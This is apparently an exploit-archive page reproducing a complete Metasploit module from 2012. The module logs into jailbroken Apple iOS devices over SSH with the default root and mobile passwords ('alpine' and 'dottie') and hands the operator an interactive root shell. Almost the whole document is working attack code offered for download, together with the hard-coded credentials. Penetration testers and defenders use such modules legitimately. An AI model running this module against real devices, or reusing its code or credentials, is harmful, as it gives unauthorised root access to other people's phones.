Apple iOS Default SSH Password



EKU-ID: 2695 CVE: OSVDB-ID:
Author: H D Moore Published: 2012-10-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Auxiliary::CommandShell

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Apple iOS Default SSH Password Vulnerability",
			'Description'    => %q{
				This module exploits the default credentials of Apple iOS when it
				has been jailbroken and the passwords for the 'root' and 'mobile'
				users have not been changed.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'hdm'
				],
			'References'     =>
				[

				],
			'DefaultOptions'  =>
				{
					'ExitFunction' => "none"
				},
			'Payload'        =>
				{
					'Compat' => {
						'PayloadType'    => 'cmd_interact',
						'ConnectionType' => 'find'
					}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ],
				],
			'Privileged'     => true,
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RHOST(),
				Opt::RPORT(22)
			], self.class
		)

		register_advanced_options(
			[
				OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
				OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
			]
		)
	end


	def rhost
		datastore['RHOST']
	end


	def rport
		datastore['RPORT']
	end


	def do_login(user, pass)
		opts = {
			:auth_methods => ['password', 'keyboard-interactive'],
			:msframework  => framework,
			:msfmodule    => self,
			:port         => rport,
			:disable_agent => true,
			:config => false,
			:password => pass,
			:record_auth_info => true,
			:proxies => datastore['Proxies']
		}

		opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

		begin
			ssh = nil
			::Timeout.timeout(datastore['SSH_TIMEOUT']) do
				ssh = Net::SSH.start(rhost, user, opts)
			end
		rescue Rex::ConnectionError, Rex::AddressInUse
			return
		rescue Net::SSH::Disconnect, ::EOFError
			print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
			return
		rescue ::Timeout::Error
			print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
			return
		rescue Net::SSH::AuthenticationFailed
			print_error "#{rhost}:#{rport} SSH - Failed authentication"
		rescue Net::SSH::Exception => e
			print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
			return
		end

		if ssh
			conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
			ssh = nil
			return conn
		end

		return nil
	end


	def exploit
		self.target['accounts'].each do |info|
			user,pass = info
			print_status("#{rhost}:#{rport} - Attempt to login as '#{user}' with password '#{pass}'")
			conn = do_login(user, pass)
			if conn
				print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'")
				handler(conn.lsock)
				break
			end
		end
	end
end